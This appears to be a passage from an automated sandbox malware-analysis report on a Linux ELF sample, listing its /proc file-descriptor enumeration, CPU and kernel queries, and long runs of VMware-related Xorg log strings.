Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/1334/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/2302/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/2302/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/115/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/115/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/115/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/115/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/236/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/236/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/236/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/236/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/116/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/116/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/116/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/116/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/237/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/237/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/237/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/237/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/117/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/117/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/117/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/117/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/118/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/118/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/118/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/118/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/910/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/910/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/910/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/910/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/119/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/119/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/119/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/119/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/912/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/912/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/912/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/912/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/10/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/10/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/10/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/10/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/2307/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/2307/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/2307/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/2307/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/11/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/11/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/11/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/11/fd/Jump to behavior
Source: /usr/share/language-tools/language-options (PID: 6337)Shell command executed: sh -c "locale -a | grep -F .utf8 "Jump to behavior
Source: /usr/lib/xorg/Xorg (PID: 6405)Shell command executed: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""Jump to behavior
Source: /bin/sh (PID: 6339)Grep executable: /usr/bin/grep -> grep -F .utf8Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)Reads from proc file: /proc/cpuinfoJump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)Reads from proc file: /proc/meminfoJump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6321)File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6321)File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /usr/lib/xorg/Xorg (PID: 6374)Log file created: /var/log/Xorg.0.logJump to dropped file
Source: /usr/lib/xorg/Xorg (PID: 6374)Truncated file: /var/log/Xorg.pid-6374.logJump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pulseaudio (PID: 6324)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/lib/xorg/Xorg (PID: 6374)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/pulseaudio (PID: 6324)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/gdm3/gdm-session-worker (PID: 6342)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/gdm3/gdm-x-session (PID: 6372)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/xorg/Xorg (PID: 6374)Queries kernel information via 'uname': Jump to behavior
Source: Xorg.0.log.47.drBinary or memory string: [ 436.379] (II) vmware(0): Not using default mode "1792x1344" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.912] (II) vmware(0): Modeline "640x480"x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync (31.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.661] (II) event2 - VirtualPS/2 VMware VMMouse: device is a pointer
Source: Xorg.0.log.47.drBinary or memory string: [ 436.363] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.728] (II) vmware(0): Not using default mode "700x450" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 434.861] (WW) vmware(0): Disabling RandR12+ support.
Source: Xorg.0.log.47.drBinary or memory string: [ 436.609] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.336] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.788] (II) vmware(0): Modeline "1152x864"x85.0 119.65 1152 1224 1352 1552 864 865 868 907 -hsync +vsync (77.1 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.717] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration factor: 2.000
Source: Xorg.0.log.47.drBinary or memory string: [ 435.064] (--) vmware(0): caps: 0xFDFF83E2
Source: Xorg.0.log.47.drBinary or memory string: [ 442.752] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/mouse0)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.352] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.469] (II) vmware(0): Not using default mode "1600x1024" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.604] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.597] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.485] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.552] (II) vmware(0): Not using default mode "432x243" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.551] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration threshold: 4
Source: Xorg.0.log.47.drBinary or memory string: [ 436.947] (II) vmware(0): Modeline "640x350"x85.1 31.50 640 672 736 832 350 382 385 445 +hsync -vsync (37.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.873] (**) vmware(0): Default mode "800x600": 40.0 MHz, 37.9 kHz, 60.3 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.903] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.9 kHz, 72.8 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.368] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.186] (==) vmware(0): Using gamma correction (1.0, 1.0, 1.0)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.630] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.723] (II) vmware(0): Not using default mode "700x450" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.618] (II) Using input driver 'libinput' for 'VirtualPS/2 VMware VMMouse'
Source: Xorg.0.log.47.drBinary or memory string: [ 436.819] (II) vmware(0): Modeline "1024x768"x85.0 94.50 1024 1072 1168 1376 768 769 772 808 +hsync +vsync (68.7 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.091] (--) vmware(0): mwidt: 1176
Source: Xorg.0.log.47.drBinary or memory string: [ 436.805] (**) vmware(0): Default mode "1152x864": 96.8 MHz, 63.0 kHz, 70.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.541] (II) vmware(0): Not using default mode "360x202" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.739] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.865] (II) vmware(0): Modeline "800x600"x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync (46.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.862] (**) vmware(0): Default mode "800x600": 49.5 MHz, 46.9 kHz, 75.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.444] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.104] (--) vmware(0): bpp: 32
Source: Xorg.0.log.47.drBinary or memory string: [ 436.944] (**) vmware(0): Default mode "640x350": 31.5 MHz, 37.9 kHz, 85.1 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.915] (**) vmware(0): Default mode "720x405": 22.5 MHz, 25.1 kHz, 59.5 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.480] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.652] (II) vmware(0): Not using default mode "3200x1800" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.568] (II) vmware(0): Not using default mode "512x288" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.837] (**) vmware(0): Default mode "1024x576": 46.5 MHz, 35.9 kHz, 59.9 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.557] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.859] (II) vmware(0): Modeline "800x600"x85.1 56.30 800 832 896 1048 600 601 604 631 +hsync +vsync (53.7 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.466] (II) event3 - VirtualPS/2 VMware VMMouse: device is a pointer
Source: Xorg.0.log.47.drBinary or memory string: [ 436.742] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.591] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.459] (II) event3 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
Source: Xorg.0.log.47.drBinary or memory string: [ 436.328] (II) vmware(0): Not using default mode "1280x960" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.523] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.439] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.702] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.099] (--) vmware(0): depth: 24
Source: Xorg.0.log.47.drBinary or memory string: [ 436.365] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.472] (II) vmware(0): Not using default mode "800x512" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.625] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.935] (II) vmware(0): Modeline "640x360"x59.8 18.00 640 664 720 800 360 363 368 376 -hsync +vsync (22.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.492] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.694] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.078] (--) vmware(0): bpp: 32
Source: Xorg.0.log.47.drBinary or memory string: [ 436.441] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.578] (II) event3 - VirtualPS/2 VMware VMMouse: device is a pointer
Source: Xorg.0.log.47.drBinary or memory string: [ 436.559] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.280] (II) vmware(0): Not using default mode "1024x768i" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.256] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.139] (==) vmware(0): Default visual is TrueColor
Source: Xorg.0.log.47.drBinary or memory string: [ 436.405] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.543] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration factor: 2.000
Source: Xorg.0.log.47.drBinary or memory string: [ 436.394] (II) vmware(0): Not using default mode "1856x1392" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.565] (II) vmware(0): Not using default mode "512x288" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.157] (==) vmware(0): Silken mouse enabled
Source: Xorg.0.log.47.drBinary or memory string: [ 442.529] (**) VirtualPS/2 VMware VMMouse: (accel) selected scheme none/0
Source: Xorg.0.log.47.drBinary or memory string: [ 436.410] (II) vmware(0): Not using default mode "416x312" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.747] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.710] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.731] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.620] (II) vmware(0): Not using default mode "1024x576" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.326] (II) vmware(0): Not using default mode "640x480" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 432.352] (==) Matched vmware as autoconfigured driver 0
Source: Xorg.0.log.47.drBinary or memory string: [ 436.633] (II) vmware(0): Not using default mode "2880x1620" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.357] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.402] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.615] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
Source: Xorg.0.log.47.drBinary or memory string: [ 436.897] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.5 kHz, 75.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 442.395] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
Source: Xorg.0.log.47.drBinary or memory string: [ 442.399] (II) Using input driver 'libinput' for 'VirtualPS/2 VMware VMMouse'
Source: Xorg.0.log.47.drBinary or memory string: [ 444.610] (II) vmware(0): Terminating Xv video-stream id:0
Source: Xorg.0.log.47.drBinary or memory string: [ 436.503] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.413] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.475] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.769] (**) vmware(0): *Driver mode "vmwlegacy-default-800x600": 36.3 MHz, 36.2 kHz, 60.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.854] (II) vmware(0): Modeline "960x540"x59.6 40.75 960 992 1088 1216 540 543 548 562 -hsync +vsync (33.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.201] (II) vmware(0): Not using default mode "320x175" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.391] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/event3)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.472] (II) event3 - VirtualPS/2 VMware VMMouse: device removed
Source: Xorg.0.log.47.drBinary or memory string: [ 435.289] (II) vmware(0): Not using default mode "512x384i" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.821] (**) vmware(0): Default mode "1024x768": 78.8 MHz, 60.0 kHz, 75.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.399] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.237] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.381] (II) vmware(0): Not using default mode "896x672" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 444.561] (II) event2 - VirtualPS/2 VMware VMMouse: device removed
Source: Xorg.0.log.47.drBinary or memory string: [ 435.225] (II) vmware(0): Not using default mode "320x240" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.744] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.508] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.725] (II) vmware(0): Not using default mode "1400x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.451] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.161] (==) vmware(0): Will set up a driver mode with dimensions 800x600.
Source: Xorg.0.log.47.drBinary or memory string: [ 436.824] (II) vmware(0): Modeline "1024x768"x75.0 78.75 1024 1040 1136 1312 768 769 772 800 +hsync +vsync (60.0 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.307] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.360] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.927] (**) vmware(0): Default mode "640x400": 31.5 MHz, 37.9 kHz, 85.1 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.497] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.415] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.207] (II) vmware(0): Not using default mode "320x200" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.578] (II) vmware(0): Not using default mode "640x360" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.546] (II) vmware(0): Not using default mode "432x243" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.678] (II) vmware(0): Not using default mode "5120x2880" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.882] (II) vmware(0): Modeline "800x600"x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync (35.2 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.611] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/event2)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.816] (**) vmware(0): Default mode "1024x768": 94.5 MHz, 68.7 kHz, 85.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.924] (II) vmware(0): Modeline "720x400"x85.0 35.50 720 756 828 936 400 401 404 446 -hsync +vsync (37.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.088] (II) vmware(0): Initialized VMware Xinerama extension.
Source: Xorg.0.log.47.drBinary or memory string: [ 432.503] (II) vmware: driver for VMware SVGA: vmware0405, vmware0710
Source: Xorg.0.log.47.drBinary or memory string: [ 436.832] (**) vmware(0): Default mode "1024x768": 65.0 MHz, 48.4 kHz, 60.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.894] (II) vmware(0): Modeline "640x480"x85.0 36.00 640 696 752 832 480 481 484 509 -hsync -vsync (43.3 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.392] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.387] (II) vmware(0): Not using default mode "896x672" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.794] (II) vmware(0): Modeline "1152x864"x75.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync (67.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.221] (II) vmware(0): Not using default mode "320x240" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.531] (II) vmware(0): Not using default mode "320x180" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.086] (--) vmware(0): pbase: 0xe8000000
Source: Xorg.0.log.47.drBinary or memory string: [ 436.718] (II) vmware(0): Not using default mode "640x400" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 434.863] (--) vmware(0): VMware SVGA regs at (0x1070, 0x1071)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.843] (**) vmware(0): Default mode "832x624": 57.3 MHz, 49.7 kHz, 74.6 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.456] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 444.459] (II) event3 - VirtualPS/2 VMware VMMouse: device removed
Source: Xorg.0.log.47.drBinary or memory string: [ 442.714] (**) VirtualPS/2 VMware VMMouse: (accel) selected scheme none/0
Source: Xorg.0.log.47.drBinary or memory string: [ 435.095] (--) vmware(0): mheig: 885
Source: Xorg.0.log.47.drBinary or memory string: [ 436.929] (II) vmware(0): Modeline "640x400"x85.1 31.50 640 672 736 832 400 401 404 445 -hsync +vsync (37.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.721] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration threshold: 4
Source: Xorg.0.log.47.drBinary or memory string: [ 436.528] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.373] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.856] (**) vmware(0): Default mode "800x600": 56.3 MHz, 53.7 kHz, 85.1 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.321] (II) vmware(0): Not using default mode "1280x960" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.848] (**) vmware(0): Default mode "960x540": 40.8 MHz, 33.5 kHz, 59.6 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.733] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.736] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
Source: Xorg.0.log.47.drBinary or memory string: [ 436.777] (II) vmware(0): Modeline "1152x864"x100.0 143.47 1152 1232 1360 1568 864 865 868 915 -hsync +vsync (91.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.397] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.092] (II) vmware(0): vgaHWGetIOBase: hwp->IOBase is 0x03d0
Source: Xorg.0.log.47.drBinary or memory string: [ 436.720] (II) vmware(0): Not using default mode "1400x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.389] (II) vmware(0): Not using default mode "1856x1392" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.522] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.589] (II) vmware(0): Not using default mode "684x384" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.712] (II) vmware(0): Not using default mode "640x400" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.355] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.148] (==) vmware(0): Backing store enabled
Source: Xorg.0.log.47.drBinary or memory string: [ 436.675] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.338] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.680] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 432.373] (II) Loading /usr/lib/xorg/modules/drivers/vmware_drv.so
Source: Xorg.0.log.47.drBinary or memory string: [ 436.761] (II) vmware(0): Not using default mode "2560x1600" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.891] (**) vmware(0): Default mode "640x480": 36.0 MHz, 43.3 kHz, 85.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.802] (II) vmware(0): Modeline "1152x864"x75.0 104.99 1152 1224 1352 1552 864 865 868 902 -hsync +vsync (67.6 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.909] (**) vmware(0): Default mode "640x480": 25.2 MHz, 31.5 kHz, 59.9 Hz
